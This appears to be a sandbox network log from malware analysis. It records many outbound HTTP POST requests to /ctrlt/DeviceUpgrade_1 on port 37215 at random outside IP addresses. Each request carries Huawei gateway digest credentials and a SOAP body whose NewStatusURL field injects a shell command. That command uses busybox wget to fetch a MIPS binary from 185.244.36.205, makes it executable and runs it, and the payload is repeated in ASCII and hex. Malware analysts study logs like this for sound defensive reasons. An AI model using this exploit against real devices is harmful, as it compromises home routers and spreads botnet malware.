                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1678192.168.2.1545744197.91.162.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944449902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1679192.168.2.154419437.147.24.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944510937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1680192.168.2.1537026121.127.219.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944513083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1681192.168.2.1555696190.214.45.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944513083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1682192.168.2.155878831.212.17.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944536924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1683192.168.2.1547088156.251.119.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944555044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1684192.168.2.1545830181.107.176.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944565058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1685192.168.2.1545124157.106.246.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944583893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1686192.168.2.1541916102.35.82.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944621086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1687192.168.2.1556264222.5.165.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944623947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1688192.168.2.1537370121.125.9.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944659948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
